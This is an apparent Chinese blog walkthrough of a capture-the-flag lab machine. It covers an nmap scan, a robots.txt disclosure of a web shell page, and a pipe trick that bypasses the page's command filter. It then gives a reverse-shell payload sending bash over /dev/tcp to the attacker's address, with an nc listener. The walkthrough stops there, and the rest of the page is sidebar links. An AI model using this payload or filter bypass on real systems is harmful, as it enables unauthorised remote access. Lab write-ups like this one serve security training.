渗透思路:
nmap扫描----通过robots.txt得到/dev_shell目录----利用RCE得到反弹shell----找到.gpg文件密码并解密----sudo su提权
环境信息:靶机:192.168.101.63
攻击机:192.168.101.34
具体步骤: 1、nmap扫描sudo nmap -sV -sC -p- 192.168.101.63
扫描到2个端口:80(http)、25468(ssh)
注意到nmap扫描http端口的时候扫描到了robots.txt,其中有4个disallowed entries:
/login.php、 /dev_shell.php、 /lat_memo.html 、/passwords.html
一一访问这几个页面,发现其中http://192.168.101.63/dev_shell.php可以执行系统命令
不幸的是,很多命令都是不让执行的,比如ls
尝试之后发现whoami等可以执行的命令之后加管道符|,再加不可以执行的命令,就可以绕过限制,执行这些命令,比如
whoami | ls
所以可以利用这个页面来获得反弹shell。
攻击机上nc监听1111端口
nc -nlvp 1111
网页上输入payload:
whoami | bash -c 'exec bash -i &>/dev/tcp/192.168.101.34/1111
关注
打赏
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?